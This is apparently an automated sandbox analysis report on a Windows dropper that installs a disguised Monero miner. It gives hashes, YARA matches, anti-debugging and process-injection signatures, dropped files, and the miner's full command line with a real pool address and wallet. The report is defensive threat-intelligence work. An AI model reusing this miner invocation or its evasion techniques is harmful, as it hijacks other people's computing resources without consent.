Analysis
max time kernel: 147s
max time network: 83s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 26-11-2022 03:49
Static task: static1
Behavioral task: behavioral1
  Sample: 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
  Resource: win10v2004-20220901-en
General
Target: 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
Size: 2.2MB
MD5: be593691476b31e5bb478e3ee05cf87f
SHA1: a9f06824f8bfdb98be0d95992b0826042271170a
SHA256: 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8
SHA512: 9f7128d1d9898b9f2c0f904e846b16f86c1fcfc852cf62f47a4adf9b0645ac6c1db3157c357211a1570801044d8043dc776d474f5278dc08f9f2252d81a02cc7
SSDEEP: 49152:7Vg5tQ7axdiO2qT9zUBBl9N5HPpJ88T5UXehcb5:Rg56GyqFU59PPpJ8g5D
Malware Config
Signatures
Executes dropped EXE (1 IoC)
  Processes (pid, process):
  1508 adgwijgweog.exe
Yara rule matches (resource, yara_rule):
  \Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe: vmprotect
  C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe: vmprotect
  C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe: vmprotect
  behavioral1/memory/1508-59-0x00000000013C0000-0x0000000001706000-memory.dmp: vmprotect
  behavioral1/memory/1508-61-0x00000000013C0000-0x0000000001706000-memory.dmp: vmprotect
  behavioral1/memory/1508-63-0x00000000013C0000-0x0000000001706000-memory.dmp: vmprotect
Loads dropped DLL (1 IoC)
  Processes (pid, process):
  2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes (pid, process):
  1508 adgwijgweog.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process):
  Token: SeLockMemoryPrivilege, 1508 adgwijgweog.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (description, pid, process, target process):
  PID 2036 wrote to memory of 1508: 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe -> adgwijgweog.exe
  PID 2036 wrote to memory of 1508: 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe -> adgwijgweog.exe
  PID 2036 wrote to memory of 1508: 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe -> adgwijgweog.exe
  PID 2036 wrote to memory of 1508: 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe -> adgwijgweog.exe
Processes
C:\Users\Admin\AppData\Local\Temp\63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 2036
  C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe (child of PID 2036)
    Command line: C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe -t 1 -o stratum+tcp://pool.minexmr.com:4444 -u 42NCdZTvv3WDjVJTd4ny51SXQiKhUyprE9zrP5BsjqJu9aeWqwunHK7aHFR9ya8gJf2REyYwBMDxMjiAVPMBqsVHQqJe91y -p x
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    PID: 1508
Network
MITRE ATT&CK Matrix
Downloads
C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe
  Filesize: 1.4MB
  MD5: 8b11325f4b729b7072c050035b454759
  SHA1: a5a5cf1910339490ec429b605a324b74a92edb38
  SHA256: 785d97c2c215c3c0b76c11610680f04236ef1a5c7fbcf4a86fb5f89996858b78
  SHA512: f7951b33eac084e4921c304840da21680fa85b05bbd6e5068e9531f63a6d2f64d3ab9d1fb166703b51cc2bc9df977171a498ac91b3e472549a1c2de9d5bdf307
C:\Users\Admin\AppData\Roaming\dvigowucpu\pools.txt
  Filesize: 196B
  MD5: dfecc946287051a05f43f684a0a273f1
  SHA1: 25d44d43e38621d1f423081801ad2a1a98e8c8bb
  SHA256: f55a47d63c5d38a6b5c2d68cf31223d3e6f2549124552c20d6501cb03f890692
  SHA512: 94826732603828a424612f0edd011df01ddc89dc7aaebc185e775607b55064ee0f8d09c78748e6b590640e1e3413f28536739232adaa4d437e038f782498261d
\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe
  Filesize: 1.4MB
  MD5: 8b11325f4b729b7072c050035b454759
  SHA1: a5a5cf1910339490ec429b605a324b74a92edb38
  SHA256: 785d97c2c215c3c0b76c11610680f04236ef1a5c7fbcf4a86fb5f89996858b78
  SHA512: f7951b33eac084e4921c304840da21680fa85b05bbd6e5068e9531f63a6d2f64d3ab9d1fb166703b51cc2bc9df977171a498ac91b3e472549a1c2de9d5bdf307
memory/1508-56-0x0000000000000000-mapping.dmp
memory/1508-59-0x00000000013C0000-0x0000000001706000-memory.dmp
  Filesize: 3.3MB
memory/1508-61-0x00000000013C0000-0x0000000001706000-memory.dmp
  Filesize: 3.3MB
memory/1508-63-0x00000000013C0000-0x0000000001706000-memory.dmp
  Filesize: 3.3MB
memory/2036-54-0x0000000075631000-0x0000000075633000-memory.dmp
  Filesize: 8KB